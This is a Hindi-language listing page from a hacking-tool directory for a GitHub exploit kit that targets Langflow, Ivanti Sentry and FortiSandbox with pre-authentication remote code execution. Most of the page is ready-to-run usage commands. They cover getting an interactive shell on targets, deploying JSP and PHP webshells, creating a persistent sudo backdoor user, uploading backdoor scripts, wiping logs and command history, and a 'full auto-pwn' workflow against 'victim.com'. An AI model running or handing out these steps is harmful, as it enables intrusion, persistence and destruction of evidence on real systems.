Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-5027-Langflow | Kitploit
उपकरण/GitHubGitHub/layer-6/cve-2026-5027-langflow
विशेषाधिकार वृद्धिस्थायित्व तंत्रभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
layer-6/cve-2026-5027-langflow

CVE-2026-5027-Langflow

रिपॉजिटरी देखें

(CVE-2026-5027) और (CVE-2026-10520) (CVE-2026-25089) शोषण उपकरण:

क्लोन करें

root@kitploit:~
git clone https://github.com/Layer-6/CVE-2026-5027-Langflow.git
cd CVE-2026-5027-Langflow

उपयोग (exploit.py) फ़ाइल

स्वचालित परीक्षण और शोषण।

root@kitploit:~
python3 exploit.py -u https://target.com

CLI कस्टम सेटिंग्स

जब शेल किसी फ़ोल्डर के अंदर हो तो अपना स्वयं का वेबशेल उपयोग करें:

root@kitploit:~
python3 exploit.py -u https://target.com --shell 

(📁shells/my-shell.php)

जब शेल टूल फ़ोल्डर में हो या बिना फ़ोल्डर के टर्मिनल के अंदर हो:

root@kitploit:~
python3 exploit.py -u https://target.com --shell my-shell.php

आपका वेबशेल (PHP, Python (CGI), Perl, Ruby, ASPX) हो सकता है।

आप --t के साथ टाइमआउट सेट कर सकते हैं और --p के साथ फ़ोल्डरों और फ़ाइलों से पेलोड या कस्टम पथ लोड/उपयोग कर सकते हैं:

root@kitploit:~
python3 exploit.py -u https://target.com | -t 58 | |-p payloads.txt | | --upload-paths Dirs.txt |

उदाहरण:

root@kitploit:~
python3 exploit.py -u https://target.com --shell shells/myshell.php -t 58 -p payloads.txt --upload-paths dirs.txt

उपयोग (exploitt.py) फ़ाइल

निम्नलिखित CVE के लिए डिज़ाइन किया गया:

· CVE-2026-10520 (CVSS 10.0)

· CVE-2026-25089 (CVSS 9.1)

प्री-ऑथ रिमोट कोड निष्पादन

कोई क्रेडेंशियल आवश्यक नहीं।

📖 उपयोग

त्वरित प्रारंभ - इंटरैक्टिव मेनू (कोई तर्क नहीं)

root@kitploit:~
python3 exploitt.py

फिर निर्देशों का पालन करें:

1. लक्ष्य प्रकार चुनें (Ivanti या Forti)

  1. लक्ष्य URL दर्ज करें (उदा. https://192.168.1.100:8443)
  2. टाइमआउट, प्रॉक्सी, डीबग मोड सेट करें
  3. क्रिया चुनें (कमांड, शेल, वेबशेल, आदि)

कमांड लाइन (उन्नत)

1. Ivanti Sentry (CVE-2026-10520)

root@kitploit:~
# Check if vulnerable
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -c "id"

# Interactive shell
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -s

# Deploy JSP webshell (Tomcat)
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -w

# Create backdoor user + clean logs
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -p --clean
  1. FortiSandbox (CVE-2026-25089)
root@kitploit:~
# Single command
python3 exploitt.py -u https://forti.example.com --type forti -c "whoami"

# Interactive shell with file upload
python3 exploitt.py -u https://forti.example.com --type forti -s
# Inside shell: upload /path/local.txt /remote/path.txt

# Deploy PHP webshell
python3 exploitt.py -u https://forti.example.com --type forti -w

# Full auto‑pwn (check, shell, webshell, persist, clean)
python3 exploitt.py -u https://forti.example.com --type forti -s -w -p --clean
  1. स्वतः-पहचान (स्क्रिप्ट सेवा का अनुमान लगाती है)
root@kitploit:~
python3 exploitt.py -u https://target.example.com -c "id"
  1. प्रॉक्सी और डीबग का उपयोग करें
root@kitploit:~
python3 exploitt.py -u https://target:8443 --proxy http://127.0.0.1:8080 --debug -c "uname -a"

उपलब्ध कमांड-लाइन तर्क

इंटरैक्टिव शेल कमांड

इंटरैक्टिव शेल के अंदर आप उपयोग कर सकते हैं:

कमांडउदाहरणविवरण
normal commandidकोई भी सिस्टम कमांड निष्पादित करें

वेबशेल परिनियोजन विवरण

· Ivanti Sentry – Tomcat webapps के अंदर एक .jsp शेल परिनियोजित करता है (/usr/local/tomcat/webapps/ROOT/) · एक्सेस करें: https://target/shell_random.jsp?cmd=whoami · FortiSandbox – वेब रूट के अंदर एक .php शेल परिनियोजित करता है (/var/www/html/) · एक्सेस करें: https://target/shell_random.php?cmd=whoami

उदाहरण कार्यप्रवाह (संपूर्ण पैठ परीक्षण)

root@kitploit:~
# 1. Detect and exploit
python3 exploitt.py -u https://victim.com:8443 --type ivanti -s

# 2. Inside the shell, check privileges
id

# 3. Deploy webshell for persistence
python3 exploitt.py -u https://victim.com:8443 --type ivanti -w

# 4. Create a backdoor user
python3 exploitt.py -u https://victim.com:8443 --type ivanti -p

# 5. Clean logs
python3 exploitt.py -u https://victim.com:8443 --type ivanti --clean

Red टेलीग्राम चैनल द्वारा:

https://t.me/Red_Rooted_Ghost

टूल डाउनलोड करें
तर्कविवरण
-u, --urlलक्ष्य URL (उदा. https://192.168.1.100:8443)
--typeसेवा बलपूर्वक निर्धारित करें: ivanti या forti (वैकल्पिक, स्वतः-पहचान)
-t, --timeoutअनुरोध टाइमआउट सेकंड में (डिफ़ॉल्ट 30)
--proxyHTTP/HTTPS प्रॉक्सी (उदा. http://127.0.0.1:8080)
-d, --debugडीबग आउटपुट सक्षम करें
--uaकस्टम User‑Agent स्ट्रिंग
-c, --cmdएक कमांड निष्पादित करें और बाहर निकलें
-s, --shellइंटरैक्टिव शेल प्रारंभ करें
-w, --webshellवेबशेल परिनियोजित करें (Forti के लिए PHP, Ivanti के लिए JSP)
-p, --persistलगातार sudo-सक्षम बैकडोर उपयोगकर्ता बनाएं
--cleanशोषण के बाद लॉग और कमांड इतिहास मिटाएं
uploadupload exploit.sh /tmp/backdoor.shस्थानीय फ़ाइल को दूरस्थ होस्ट पर अपलोड करें
exitexitशेल से बाहर निकलें